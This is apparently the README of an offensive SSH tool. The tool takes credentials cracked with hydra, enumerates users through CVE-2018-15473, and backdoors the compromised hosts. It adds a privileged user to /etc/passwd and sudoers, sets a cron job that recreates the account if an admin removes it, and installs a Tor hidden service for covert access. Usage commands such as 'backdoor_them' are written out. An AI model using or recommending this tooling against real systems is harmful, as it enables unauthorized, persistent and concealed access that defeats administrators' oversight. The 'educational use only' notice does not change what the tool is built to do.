
![JeanMichel](/images/JM.png)



### Jean-Michel is able to :

- Read the successful ssh logins/passwords in a hydra output file (see hydra -o)
- Guess remote valid users according to CVE-2018-15473 
- Create a new privileged ssh account on remote targets to maintain an ssh access:
	* add a ssha user in /etc/passwd
	* add a /etc/sudoers.d/local file
	* add a cron file to automatically recreate the user if deleted manually by an admin
- Clean the mess on all remote targes if needed
- Generate a host:port file ready to use with parallel-ssh and parallel-scp
- Install a SSH Tor HiddenService on remote targets


### Examples:

Use CVE-2018-15473 to enumerate users on a target :
```
python3 JeanMichel.py -a try_users -t 192.168.0.10 -u listuser.txt
```

Print successful logins and passwords :
```
python3 JeanMichel.py -f hydra.txt (-a show_hosts)
```

If login is sudoers, you might want to recreate another account before the default one changes:
```
python3 JeanMichel.py -f hydra.txt -a backdoor_them
```

To clean everything :
```
python3 JeanMichel.py -f hydra.txt -a clean_all
```

To generate a parallel-ssh file in /tmp:
```
python3 JeanMichel.py -f hydra.txt -a write_pssh_file
```

To install tor and create a SSH HiddenService on targets:
```
python3 JeanMichel.py -f hydra.txt -a torify_them
```

### Dependencies:

For python2 :

Due to multiprocessing issues, Python2 is no longer supported, sorry :/

For python3 :

- python3-paramiko
- python3-argcomplete


## LEGAL NOTICE

THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! 
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. 
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.
